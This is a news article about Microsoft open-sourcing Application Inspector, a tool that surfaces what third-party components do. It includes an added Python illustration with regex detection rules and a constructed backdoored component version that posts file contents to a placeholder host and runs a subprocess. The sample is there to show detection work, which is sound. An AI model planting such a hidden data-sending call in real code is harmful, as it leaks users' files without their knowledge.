Microsoft Application Inspector, the company's internal tool for testing third-party components, is now open source and available to all. With the release, Microsoft hopes to prod developers to think more carefully about trusting someone else's code.
“How well do you understand what all those external software components actually do?” it poses. “You may find that you're placing as much trust in each of the thousands of contributors to those components as you have in your in-house engineering team.”
The tool is built on .NET Core, and as such runs across Linux, Windows, and macOS. Microsoft also touts benefits over conventional static analysis tools. Firstly, Application Inspector doesn't just flag bad practices – it surfaces every characteristic it considers interesting so that a human can review them.
It's also suitable for use over time: run against successive versions, it notices key changes to a component's feature set and points them out. This can help web developers identify backdoors, unexpected features, or additions that increase the likelihood of a successful attack.
Once run, Application Inspector creates a JSON or interactive HTML report that's simple to understand at a glance. You can then drill down into the details to review specific code or see the confidence level of the analysis. Microsoft says it can accurately detect the following:
- Application frameworks (development, testing)
- Cloud / Service APIs (Microsoft Azure, Amazon AWS, and Google Cloud Platform)
- Cryptography (symmetric, asymmetric, hashing, and TLS)
- Data types (sensitive, personally identifiable information)
- Operating system functions (platform identification, file system, registry, and user accounts)
- Security features (authentication and authorization)
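To make the "surface every characteristic, then watch how it changes between versions" idea concrete, here is an added Python illustration; it is not Application Inspector's code or its rule format. The regex rules and the two component versions are constructed for the example.

```python
from __future__ import annotations
import re

# Constructed, simplified characteristic rules grouped like the categories
# above (hypothetical; not the tool's real rule set): tag -> pattern.
RULES = {
    "Cryptography.Hashing": re.compile(r"\bhashlib\.|\bmd5\b|\bsha1\b|\bsha256\b", re.I),
    "Cryptography.TLS": re.compile(r"\bssl\.|\bTLS\b"),
    "Cloud.AWS": re.compile(r"\bboto3\b|amazonaws\.com"),
    "OS.FileSystem": re.compile(r"\bopen\(|\bos\.remove|\bshutil\."),
    "OS.Process": re.compile(r"\bsubprocess\.|\bos\.system"),
    "Network.Outbound": re.compile(r"\brequests\.|\burllib\.request|\bsocket\.connect"),
    "Data.Sensitive": re.compile(r"password|secret|api[_-]?key", re.I),
}

def characterize(source: str) -> dict[str, list[int]]:
    """Tag what a component does: {tag: [matching line numbers]}.
    Every hit is reported, not only 'bad' ones, so a reviewer sees the whole picture."""
    hits: dict[str, list[int]] = {}
    for lineno, line in enumerate(source.splitlines(), 1):
        for tag, pattern in RULES.items():
            if pattern.search(line):
                hits.setdefault(tag, []).append(lineno)
    return hits

def feature_diff(old: str, new: str) -> dict[str, set[str]]:
    """Compare two versions of a component and report capabilities that appeared or vanished."""
    old_tags, new_tags = set(characterize(old)), set(characterize(new))
    return {"added": new_tags - old_tags, "removed": old_tags - new_tags}

# Constructed sample: version 1 reads a file and hashes it.
V1 = """import hashlib
def load(path):
    with open(path) as fh:
        data = fh.read()
    return hashlib.sha256(data.encode()).hexdigest()
"""

# Constructed sample: version 2 quietly gains outbound network and process execution.
V2 = """import hashlib
import requests
import subprocess
def load(path):
    with open(path) as fh:
        data = fh.read()
    requests.post("https://example.invalid/collect", data=data)
    subprocess.run(["uname", "-a"])
    return hashlib.sha256(data.encode()).hexdigest()
"""

if __name__ == "__main__":
    print(characterize(V2))
    print(feature_diff(V1, V2))  # new tags are what a reviewer should look at first
```

The "added" set is the review queue: a file-hashing helper that suddenly talks to the network and spawns processes is exactly the kind of feature-set change the article describes.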
This isn't in any way a substitute for a robust human review, but it lets developers quickly check for well-known issues, and it's certainly better than nothing at all.